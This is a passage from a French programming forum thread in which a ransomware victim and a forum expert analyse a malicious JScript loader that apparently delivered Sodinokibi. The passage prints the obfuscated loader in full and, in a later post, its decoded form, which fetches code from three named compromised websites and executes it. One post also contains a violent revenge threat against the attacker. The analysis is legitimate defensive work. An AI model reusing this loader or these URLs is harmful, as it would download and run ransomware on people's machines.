    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    rl=["m",":","/","}","b"," ","C","0"];
    rE=["O","Q","n","I","U","L","M","a"];
    FJ=["h","'","?","l","y","1","W","P"];
    wg=["v","A","o",",","x","\\","-","S"];
    UB=["i","+","d","u","(","3","!","{"];
    Ly=["6",".","H","J","=","G","f","p"];
    DF=["\"","c","R","s","2",";",")","e"];
    Nu=["q","j","w","@","t","r","7","X"];
    rq=["g","E","T"];
    yc=WScript.Arguments.Length;
    cK=yc+1;
    Tv=cK+cK;
    BO=Tv+cK;
    Am=BO+cK;
    YD=Am+cK;
    ze=YD+cK;
    pW=ze+cK;
    Tx=pW+cK;
    QD=Tx+cK;
    function tU(iE,Ft){return Ft=(iE);}
    HG=DF[cK]+wg[Tv]+rE[Tv];
    by=DF[BO]+Nu[Am]+Nu[YD];
    Nt=UB[BO]+DF[cK]+Nu[Am];
    Ml=wg[Tv]+Nu[YD];
    OV=HG+by+Nt+Ml;
    tU=tU[tU(OV)];
    yJ=FJ[ze]+wg[pW]+DF[cK];
    eH=Nu[YD]+UB[yc]+Ly[pW];
    jT=Nu[Am]+Ly[cK]+DF[BO];
    fV=FJ[BO]+DF[pW]+DF[pW];
    Rs=Ly[pW]+UB[Am]+FJ[YD];
    wr=Nu[ze]+rl[pW]+rl[pW];
    Vc=rl[pW]+DF[ze]+DF[YD];
    WQ=rl[YD]+Ly[ze]+UB[BO];
    ZC=rE[Tv]+DF[cK]+Nu[Am];
    tG=UB[yc]+wg[Tv]+rE[Tv];
    rD=rl[YD]+rE[pW]+DF[Tv];
    tL=UB[Am]+rE[cK]+rq[yc];
    xP=DF[ze]+rl[YD]+UB[pW];
    PZ=rl[YD]+wg[cK]+wg[Am];
    Jv=rl[YD]+Ly[Am]+rl[YD];
    eP=FJ[ze]+wg[pW]+DF[cK];
    sj=Nu[YD]+UB[yc]+Ly[pW];
    Ns=Nu[Am]+Ly[cK]+rl[ze];
    xH=Nu[YD]+DF[pW]+rE[pW];
    ZE=Nu[Am]+DF[pW]+rE[yc];
    iW=rl[Am]+Nu[cK]+DF[pW];
    IH=DF[cK]+Nu[Am]+UB[Am];
    br=FJ[cK]+rE[ze]+wg[pW];
    qY=Nu[pW]+rE[ze]+rE[YD];
    KZ=DF[Am]+Ly[cK]+wg[pW];
    De=DF[pW]+Nu[YD]+wg[yc];
    Dl=DF[pW]+Nu[YD]+Nu[pW];
    Tg=rE[ze]+rE[YD]+Ly[Tv];
    mw=rq[Tv]+rq[Tv]+FJ[pW];
    eg=FJ[cK]+DF[ze]+DF[YD];
    vH=rl[YD]+rE[YD]+Ly[Tv];
    Mj=rl[YD]+Ly[Am]+rl[YD];
    LO=rE[ze]+rE[pW]+Nu[Am];
    Kt=FJ[yc]+Ly[cK]+Nu[YD];
    XH=rE[pW]+rE[Tv]+UB[Tv];
    fn=wg[Tv]+rl[yc]+UB[Am];
    Es=DF[ze]+Ly[cK]+Nu[Am];
    xF=wg[Tv]+wg[pW]+Nu[Am];
    cx=Nu[YD]+UB[yc]+rE[Tv];
    Xb=rq[yc]+UB[Am]+DF[ze];
    XJ=Ly[cK]+DF[BO]+UB[BO];
    Pi=rl[Am]+DF[BO]+Nu[Am];
    qr=Nu[YD]+UB[Am]+DF[Am];
    yi=wg[BO]+FJ[YD]+rl[pW];
    Yj=rl[pW]+DF[ze]+DF[YD];
    eG=rl[YD]+Nu[Am]+Nu[YD];
    Ka=FJ[Am]+UB[pW]+rl[YD];
    Ii=wg[cK]+wg[Am]+Ly[cK];
    gi=wg[Tv]+Ly[pW]+DF[pW];
    lD=rE[Tv]+UB[Am]+FJ[cK];
    Pd=Ly[YD]+rq[cK]+rq[Tv];
    LJ=FJ[cK]+wg[BO]+rl[YD];
    TE=rE[cK]+rq[yc]+UB[cK];
    aU=DF[yc]+FJ[Tv]+Ly[ze];
    ki=FJ[Am]+DF[BO]+FJ[Am];
    ho=Nu[YD]+Nu[Am]+FJ[BO];
    CS=FJ[yc]+Ly[pW]+Nu[Tv];
    aB=UB[yc]+Nu[YD]+rE[pW];
    NL=Nu[Tv]+rE[Tv]+DF[BO];
    HC=rE[pW]+Ly[Am]+DF[yc];
    Ll=UB[cK]+rE[YD]+Ly[Tv];
    pi=wg[BO]+rl[YD]+Ly[ze];
    UU=rE[pW]+FJ[BO]+DF[BO];
    oP=DF[pW]+DF[ze]+DF[YD];
    Ei=rl[YD]+wg[cK]+wg[Am];
    UM=Ly[cK]+DF[BO]+DF[pW];
    uT=rE[Tv]+UB[Tv]+UB[Am];
    uR=DF[ze]+DF[YD]+rl[YD];
    Xy=rl[BO]+DF[cK]+rE[pW];
    pp=Nu[Am]+DF[cK]+FJ[yc];
    NO=UB[Am]+DF[pW]+DF[ze];
    Wr=UB[pW]+rl[YD]+Nu[YD];
    Pv=DF[pW]+Nu[Am]+UB[BO];
    xj=Nu[YD]+rE[Tv]+rl[YD];
    Ix=Ly[ze]+rE[pW]+FJ[BO];
    Jr=DF[BO]+DF[pW]+DF[YD];
    WV=rl[YD]+rl[BO]+rl[YD];
    Fu=UB[yc]+Ly[ze]+rl[YD];
    EA=UB[Am]+wg[cK]+wg[Am];
    pS=Ly[cK]+DF[BO]+Nu[Am];
    Cp=rE[pW]+Nu[Am]+UB[BO];
    Je=DF[BO]+rl[YD]+Ly[Am];
    JB=Ly[Am]+Ly[Am]+rl[YD];
    BM=DF[Am]+rl[pW]+rl[pW];
    sv=DF[ze]+rl[YD]+UB[pW];
    sg=rl[YD]+wg[yc]+rE[pW];
    DM=Nu[YD]+rl[YD]+DF[pW];
    Wy=Ly[BO]+rl[YD]+Ly[Am];
    YL=rl[YD]+wg[cK]+wg[Am];
    Mg=Ly[cK]+Nu[YD]+DF[pW];
    AZ=DF[BO]+Ly[pW]+wg[Tv];
    lI=rE[Tv]+DF[BO]+DF[pW];
    dZ=rq[Tv]+DF[pW]+wg[Am];
    dQ=Nu[Am]+DF[YD]+rl[YD];
    wM=UB[yc]+Ly[ze]+rl[YD];
    hq=UB[Am]+UB[Am]+DF[pW];
    wK=Ly[BO]+Ly[cK]+UB[yc];
    QH=rE[Tv]+UB[Tv]+DF[pW];
    VH=wg[Am]+rE[yc]+Ly[ze];
    PG=UB[Am]+DF[yc]+Nu[BO];
    pQ=DF[yc]+UB[cK]+rE[YD];
    NE=Ly[Tv]+UB[cK]+DF[yc];
    dh=Nu[BO]+DF[yc]+wg[BO];
    OA=rl[YD]+rl[pW]+DF[ze];
    Zy=DF[ze]+Ly[Am]+Ly[Am];
    xf=wg[ze]+FJ[YD]+DF[ze];
    Cb=rl[YD]+UB[pW]+rl[YD];
    dr=Nu[YD]+DF[pW]+Nu[Am];
    KE=UB[BO]+Nu[YD]+rE[Tv];
    Qm=rl[YD]+Ly[ze]+rE[pW];
    qc=FJ[BO]+DF[BO]+DF[pW];
    nx=DF[YD]+rl[YD]+rl[BO];
    sQ=rl[YD]+DF[pW]+FJ[BO];
    Zr=DF[BO]+DF[pW]+rl[YD];
    Tf=UB[pW]+rl[YD]+DF[pW];
    oR=Ly[BO]+rl[YD]+Ly[Am];
    Ow=rl[YD]+DF[pW]+Ly[BO];
    Vm=Ly[cK]+Nu[YD]+DF[pW];
    DG=Ly[pW]+FJ[BO]+rE[pW];
    VY=DF[cK]+DF[pW]+UB[Am];
    BP=DF[yc]+Nu[BO]+DF[yc];
    Cv=UB[cK]+rE[YD]+Ly[Tv];
    el=UB[cK]+DF[yc]+Nu[BO];
    kC=DF[yc]+wg[BO]+DF[yc];
    Wo=DF[yc]+DF[ze]+DF[YD];
    lj=rl[YD]+wg[yc]+rE[pW];
    Pe=Nu[YD]+rl[YD]+rE[yc];
    UJ=wg[yc]+rl[YD]+Ly[Am];
    bI=rl[YD]+DF[pW]+Ly[BO];
    yT=Ly[cK]+Nu[YD]+DF[pW];
    Ae=Ly[pW]+FJ[BO]+rE[pW];
    cB=DF[cK]+DF[pW]+UB[Am];
    tJ=rl[Tv]+UB[Am]+wg[YD];
    GL=UB[Tv]+UB[pW]+DF[Am];
    Mk=rl[BO]+DF[ze]+rl[Tv];
    pw=rq[yc]+wg[BO]+rl[YD];
    Md=Ly[ze]+UB[BO]+rE[Tv];
    KY=DF[cK]+Nu[Am]+UB[yc];
    Ry=wg[Tv]+rE[Tv]+rl[YD];
    vl=UB[Am]+FJ[Am]+wg[Am];
    LY=DF[ze]+rl[YD]+UB[pW];
    CX=rl[YD]+Nu[YD]+DF[pW];
    dD=Nu[Am]+UB[BO]+Nu[YD];
    Bm=rE[Tv]+rl[YD]+wg[pW];
    QL=Nu[Am]+Nu[YD]+UB[yc];
    fF=rE[Tv]+rq[yc]+Ly[cK];
    Af=Ly[ze]+Nu[YD]+wg[Tv];
    Zg=rl[yc]+rl[ze]+FJ[yc];
    DZ=rE[pW]+Nu[YD]+rl[ze];
    gC=wg[Tv]+UB[Tv]+DF[pW];
    Ic=UB[Am]+Ly[pW]+rE[pW];
    LM=Nu[YD]+DF[BO]+DF[pW];
    AH=rE[BO]+rE[Tv]+Nu[Am];
    gV=UB[Am]+FJ[Am]+wg[Am];
    oK=wg[BO]+FJ[YD]+rl[pW];
    Hc=DF[ze]+UB[cK]+UB[YD];
    gA=rl[pW]+DF[ze]+DF[YD];
    Lm=rl[YD]+rl[BO]+DF[ze];
    pZ=DF[YD]+rl[YD]+Nu[Am];
    uw=rE[Am]+UB[Am]+rE[yc];
    AL=wg[yc]+DF[ze]+UB[Am];
    rO=DF[ze]+DF[YD]+rl[YD];
    iR=Nu[YD]+DF[pW]+Nu[Am];
    wS=UB[BO]+Nu[YD]+rE[Tv];
    Qe=rl[YD]+Nu[Am]+Nu[YD];
    ru=UB[BO]+DF[pW]+DF[YD];
    vC=rl[YD]+rl[BO]+rl[YD];
    km=rl[BO]+rl[YD]+DF[pW];
    nb=FJ[BO]+DF[BO]+DF[pW];
    fS=rl[YD]+UB[pW]+rl[YD];
    mE=Nu[YD]+DF[pW]+Nu[Am];
    Yg=UB[BO]+Nu[YD]+rE[Tv];
    ZR=rl[YD]+Ly[ze]+rE[pW];
    ym=FJ[BO]+DF[BO]+DF[pW];
    zR=DF[YD]+rl[YD]+rl[BO];
    Xa=rl[YD]+rl[BO]+rl[YD];
    rf=UB[yc]+Ly[ze]+rl[YD];
    ij=UB[Am]+UB[ze]+rl[YD];
    pC=rE[pW]+DF[Tv]+UB[Am];
    cR=FJ[cK]+FJ[yc]+Nu[Am];
    Vw=Nu[Am]+Ly[pW]+rl[cK];
    Ln=rl[Tv]+rl[Tv]+Nu[Tv];
    Uz=UB[yc]+rl[yc]+rE[pW];
    gv=Nu[YD]+Nu[cK]+rE[pW];
    ud=DF[pW]+rq[yc]+DF[pW];
    jQ=Nu[YD]+Ly[cK]+rE[Tv];
    YA=FJ[BO]+rl[Tv]+UB[BO];
    ZX=Ly[pW]+UB[Tv]+rE[pW];
    fZ=Nu[Am]+DF[pW]+Ly[cK];
    pH=Ly[pW]+FJ[yc]+Ly[pW];
    RT=FJ[cK]+DF[ze]+DF[ze];
    Dj=rl[YD]+UB[pW]+rl[YD];
    em=FJ[ze]+wg[pW]+DF[cK];
    NZ=Nu[YD]+UB[yc]+Ly[pW];
    hB=Nu[Am]+Ly[cK]+DF[BO];
    LT=FJ[BO]+DF[pW]+DF[pW];
    DA=Ly[pW]+UB[Am]+UB[YD];
    Uh=rl[pW]+rl[pW]+rl[pW];
    ei=rl[pW]+DF[ze]+DF[YD];
    TY=rl[YD]+UB[yc]+Ly[ze];
    Nc=rl[YD]+UB[Am]+UB[ze];
    VL=rl[YD]+rE[pW]+DF[Tv];
    Yw=UB[Am]+FJ[cK]+FJ[yc];
    mo=Nu[Am]+Nu[Am]+Ly[pW];
    Vf=rl[cK]+rl[Tv]+rl[Tv];
    cQ=Nu[Tv]+Nu[Tv]+Nu[Tv];
    Dt=Ly[cK]+DF[pW]+FJ[BO];
    KB=UB[yc]+DF[BO]+rE[pW];
    xG=UB[Tv]+DF[pW]+wg[yc];
    ma=rE[pW]+FJ[BO]+Ly[cK];
    WJ=DF[cK]+wg[Tv]+rl[yc];
    Su=rl[Tv]+UB[BO]+Ly[pW];
    zJ=UB[Tv]+rE[pW]+Nu[Am];
    zc=DF[pW]+Ly[cK]+Ly[pW];
    ZQ=FJ[yc]+Ly[pW]+FJ[cK];
    CR=DF[ze]+DF[ze]+rl[YD];
    er=UB[pW]+rl[YD]+FJ[ze];
    dU=wg[pW]+DF[cK]+Nu[YD];
    HP=UB[yc]+Ly[pW]+Nu[Am];
    Av=Ly[cK]+DF[BO]+FJ[BO];
    iB=DF[pW]+DF[pW]+Ly[pW];
    wc=UB[Am]+Ly[yc]+rl[pW];
    Mq=rl[pW]+rl[pW]+rl[pW];
    Uw=DF[ze]+DF[YD]+rl[YD];
    na=rE[pW]+DF[Tv]+UB[Am];
    iX=FJ[cK]+FJ[yc]+Nu[Am];
    RA=Nu[Am]+Ly[pW]+rl[cK];
    sN=rl[Tv]+rl[Tv]+Nu[Tv];
    YH=Nu[Tv]+Nu[Tv]+Ly[cK];
    ED=Nu[yc]+UB[BO]+UB[yc];
    AI=rE[Tv]+rE[Tv]+DF[pW];
    wU=FJ[BO]+Ly[cK]+DF[cK];
    yd=wg[Tv]+rl[yc]+rl[Tv];
    jg=UB[BO]+Ly[pW]+UB[Tv];
    VV=rE[pW]+Nu[Am]+DF[pW];
    yg=Ly[cK]+Ly[pW]+FJ[yc];
    Eq=Ly[pW]+FJ[cK]+DF[ze];
    QO=DF[YD]+rl[YD]+rl[BO];
    pK=rl[YD]+rl[BO];
    WS=yJ+eH+jT;
    ay=WS+fV+Rs+wr+Vc+WQ;
    TG=ay+ZC+tG+rD;
    nM=TG+tL+xP+PZ;
    WY=nM+Jv+eP+sj+Ns;
    Lc=WY+xH+ZE;
    qE=Lc+iW+IH+br+qY+KZ;
    JP=qE+De+Dl+Tg;
    eV=JP+mw+eg;
    td=eV+vH+Mj;
    Yc=td+LO+Kt;
    gp=Yc+XH+fn+Es;
    fk=gp+xF+cx+Xb+XJ;
    rB=fk+Pi+qr+yi+Yj;
    kE=rB+eG+Ka+Ii+gi+lD;
    MS=kE+Pd+LJ;
    ah=MS+TE+aU+ki+ho;
    MB=ah+CS+aB+NL;
    BK=MB+HC+Ll+pi;
    UQ=BK+UU+oP+Ei+UM+uT;
    pt=UQ+uR+Xy+pp+NO+Wr;
    Fg=pt+Pv+xj+Ix+Jr+WV;
    Mu=Fg+Fu+EA;
    gb=Mu+pS+Cp;
    cG=gb+Je+JB+BM;
    zi=cG+sv+sg+DM+Wy;
    nY=zi+YL+Mg+AZ+lI;
    zm=nY+dZ+dQ;
    RC=zm+wM+hq+wK+QH+VH;
    xK=RC+PG+pQ+NE+dh+OA;
    Em=xK+Zy+xf+Cb;
    ra=Em+dr+KE;
    OD=ra+Qm+qc+nx+sQ+Zr;
    bE=OD+Tf+oR+Ow+Vm;
    Ai=bE+DG+VY+BP;
    JR=Ai+Cv+el+kC;
    Zx=JR+Wo+lj+Pe+UJ;
    MO=Zx+bI+yT+Ae;
    xs=MO+cB+tJ+GL+Mk+pw;
    FH=xs+Md+KY+Ry+vl+LY;
    de=FH+CX+dD+Bm;
    FA=de+QL+fF+Af+Zg+DZ;
    Yf=FA+gC+Ic+LM;
    kp=Yf+AH+gV+oK+Hc+gA;
    Sd=kp+Lm+pZ+uw+AL;
    kx=Sd+rO+iR;
    yl=kx+wS+Qe;
    zf=yl+ru+vC;
    WN=zf+km+nb+fS+mE;
    Wi=WN+Yg+ZR+ym;
    EB=Wi+zR+Xa;
    Bj=EB+rf+ij+pC+cR;
    ry=Bj+Vw+Ln+Uz;
    Hk=ry+gv+ud+jQ;
    wn=Hk+YA+ZX+fZ+pH+RT;
    os=wn+Dj+em+NZ+hB;
    Tr=os+LT+DA+Uh+ei+TY;
    Ez=Tr+Nc+VL+Yw+mo;
    Py=Ez+Vf+cQ+Dt+KB;
    dx=Py+xG+ma+WJ+Su;
    pc=dx+zJ+zc+ZQ;
    eu=pc+CR+er;
    LV=eu+dU+HP+Av+iB+wc;
    cU=LV+Mq+Uw;
    Uc=cU+na+iX+RA+sN;
    Kq=Uc+YH+ED;
    he=Kq+AI+wU+yd+jg;
    hI=he+VV+yg+Eq;
    Nl=hI+QO+pK;
    tU(Nl)(tU('')(648163));

  10. #10
    Expert éminent
    Avatar de Watilin
    Homme Profil pro
    En recherche d'emploi
    Inscrit en
    juin 2010
    Messages
    3 000
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 30
    Localisation : France, Ille et Vilaine (Bretagne)

    Informations professionnelles :
    Activité : En recherche d'emploi

    Informations forums :
    Inscription : juin 2010
    Messages : 3 000
    Points : 6 500
    Points
    6 500
    Par défaut
    Chose bizarre, c'est que Kaspersky supprime un backup de Notepad++ mais quand j'ai lancé une analyse directement sur le fichier JS il dit qu'il ne trouve rien anormal alors que les deux documents contiennent le même code.
    Au hasard je dirais que ça dépend de l’emplacement du fichier. Mais la logique des antivirus est parfois aussi obtuse que celle des maliciels…

    Tu entends quoi par un "simple loader" ?
    Serait-il capable d'aller télécharger un virus sur un serveur et de l'exécuter ?
    Oui, c’est de ça qu’il s’agit. En temps normal, JavaScript a trop de restrictions pour être capable de lancer un exécutable ou quoi que ce soit de dangereux. Mais vu que le nom du fichier comtient -xls, il se pourrait qu’il soit en fait une macro de MS Excel conçue pour tirer parti de failles présentes dans des versions non à jour du logiciel. Ça expliquerait pourquoi le script ressemble beaucoup à du JavaScript tout en utilisant des fonctionnalités spécifiques à Microsoft.
    As-tu ouvert une feuille de calcul récemment ?

    Ou alors ce -xls est placé là juste pour faire croire à un fichier inoffensif.

    Dans un navigateur, un script JS malicieux peut tenter de tirer parti d’un plugin, par exemple Java ou Flash, ou encore d’une faille du navigateur lui-même si celui-ci n’est pas à jour.

    Par contre un truc bizarre, la page n'est plus du tout la même qu'hier....
    Hier c'était comme un post de forum avec 4/5 messages dont un qui contenait un fichier .zip à télécharger qui se nommait "exemple_bilan_de_puissance_xls.zip"
    Oui, aujourd’hui c’est un wordpress avec des articles dans différentes langues. Ceux en français ressemblent à des traductions automatiques. Les autres sont dans des langues que je ne connais pas. Ça pourrait être des copiés-collés choisis pour optimiser le classement du site dans les moteurs de recherche.

    Si le contenu a changé depuis hier, on peut faire l’hypothèse qu’il change régulièrement, pour éviter que les antivirus ne remontent la piste comme j’ai moi-même essayé de faire avec les trois domaines du script précédent.

    Je veux bien que tu postes le zip, par curiosité, mais je ne sais pas si je vais être en mesure d’y trouver quelque chose. Tu peux aussi aller voir sur le site Malekal, il y a d’excellents articles expliquant les techniques utilisées par les logiciels malveillants, et un forum où se trouvent de nombreux experts

    Edit :
    Je viens de remarquer quelques chose d'autre, étant donné que j'ai DL le fichier en question 2 fois, j'ai comparé le code des 2 fichiers.
    Je remarque que le code change entre chaque téléchargement.
    Le principe reste le même, mais les variables changent, l'ordre, etc...
    Apparamment le script est généré à la volée par un obfuscateur. Je pense que l’obfuscateur choisit ses noms de variables aléatoirement, et donc ils changent à chaque génération.
    La FAQ JavaScript – Les cours JavaScript
    Touche F12 = la console → l’outil indispensable pour développer en JavaScript !

  11. #11
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut
    T'as remarque est bonne, voyant que le fichier JS ne fonctionnait pas, j'ai changé l'extension pour la mettre en xls.
    Sans me méfier comme un âne, j'étais à 1000 lieux d'imaginer que ce genre de document, du moins ce genre de recherche de document puisse un jour m'amener vers un virus...

    Voici le fichier zip du deuxième téléchargement.

    Il serait intéressant de voir si les sites web présents dans le code changent.

    Je t'en remercie beaucoup pour ta contribution.

    Je m'acharne car la pilule à du mal à passer, j'ai eu pas loin de 100'000 fichiers cryptés.
    Toute ma life, mais je ne paierai pas, je vais le traquer même si ça doit me couter tout l'argent que je possède.
    Une fois entre mes mains je vais l'enterrer vivant dans mon jardin, il fera moins son Caïd virtuel devant de vrais cojones posées sur son front.

    ++

    ATTENTION NE PAS LANCER LE FICHIER JS, QUE LE ZIP CONTIENT, LE CONTENU DIRIGE VERS UN VIRUS
    Fichiers attachés Fichiers attachés

  12. #12
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut
    Pour info le nom du ransomware qui m'a touché est "Sodinokibi", si des personnes ont des infos dessus je les remercie d'avance.

    ++

  13. #13
    Expert éminent
    Avatar de Watilin
    Homme Profil pro
    En recherche d'emploi
    Inscrit en
    juin 2010
    Messages
    3 000
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 30
    Localisation : France, Ille et Vilaine (Bretagne)

    Informations professionnelles :
    Activité : En recherche d'emploi

    Informations forums :
    Inscription : juin 2010
    Messages : 3 000
    Points : 6 500
    Points
    6 500
    Par défaut
    Malheureusement il n’y a rien d’autre dans le .zip que le .js que tu nous as déjà montré. S’il y avait quelque chose d’autre, ton antivirus a dû le supprimer.
    Les adresses dans le script sont les mêmes :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    WScript.sleep(17000);
    function aR(Qg) {
      Ax = WScript.CreateObject('MSXML2.ServerXMLHTTP');
      LH = Math.random().toString().substr(2,100);
      try {
        Ax.open('GET', Qg+"?fysyrtlhpwirawnsa="+LH, false);
        Ax.send(); 
      }
      catch (e) {
        return false;
      }
      if (Ax.status === 200) {
        var eJ = Ax.responseText;
        if ((eJ.indexOf("@"+LH+"@", 0))==-1) {
          return false;
        }
        else {
          eJ = eJ.replace("@"+LH+"@","");
          var Ov = eJ.replace(/(\\d{2})/g, function (yx) {
            return String.fromCharCode(parseInt(yx,10)+30);
          });
          tU(Ov)();
          return true;
        }
      }
      else {
        return false;
      }
    }
     
    if (! aR('http://wimarjaeger.nl/update.php')) {
      WScript.sleep(30000);
      if (! aR('http://www.elisadeval.com/update.php')) {
        WScript.sleep(60000);
        aR('http://www.quinnel.com/update.php');
      }
    }
    J’ai eu l’idée de vérifier la page d’accueil (chemin /) de chacun de ces sites. Il apparaît que ce sont des sites légitimes, leurs administrateurs n’ont probablement pas conscience qu’ils ont été piratés. Les trois sites ont en commun d’être créés avec le CMS WordPress. Je parie que leur version de WordPress n’est pas à jour et que le pirate a utilisé une vulnérabilité connue pour y injecter un fichier upload.php malicieux.
    La FAQ JavaScript – Les cours JavaScript
    Touche F12 = la console → l’outil indispensable pour développer en JavaScript !

  14. #14
    Futur Membre du Club
    Profil pro
    Inscrit en
    novembre 2009
    Messages
    27
    Détails du profil
    Informations personnelles :
    Localisation : Suisse

    Informations forums :
    Inscription : novembre 2009
    Messages : 27
    Points : 9
    Points
    9
    Par défaut
    Il n'y avait rien d'autre dans le fichier zip.
    J'ai fait un test antivirus du premier site.
    Il me dit bien qu'il y a quelque chose de malveillant. Voici ci-dessous capture d'écran.
    Je suis retourné sur le site où j'ai trouvé le document zip à télécharger.
    La page a de nouveau changé. Voir ci-dessous capture d'écran.
    Ce site est également fait par wordpress.
    En 3 jours j'ai vu 3 pages différentes....

    La prochaine question, que pouvons nous faire des infos que nous avons obtenu, à ce jour je pense que j'ai trouvé la source de mon infection, je n'ai quasi plus de doute.
    L'idéal serait de pouvoir télécharger le virus via l'un de ces sites, sans qu'il se lance. Est-ce faisable ?

    Nom : 2019-06-15_16-32-21.png
Affichages : 57
Taille : 24,4 Ko
    Nom : 2019-06-15_16-44-08.png
Affichages : 57
Taille : 34,9 Ko

Discussions similaires

  1. Réponses: 8
    Dernier message: 15/06/2019, 17h07
  2. Trouver le code qui lance un bouton
    Par Pierreschu dans le forum Macros et VBA Excel
    Réponses: 1
    Dernier message: 04/02/2018, 10h45
  3. Crash sur code qui demande l'age
    Par Emma2064 dans le forum C
    Réponses: 7
    Dernier message: 10/06/2016, 03h04
  4. [Toutes versions] Explication sur code "Application.Match"
    Par 44jeje44 dans le forum Macros et VBA Excel
    Réponses: 2
    Dernier message: 13/04/2010, 19h05
  5. Code qui ne fonctionne pas sur Mac
    Par malbaladejo dans le forum Général JavaScript
    Réponses: 4
    Dernier message: 14/01/2005, 11h08

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo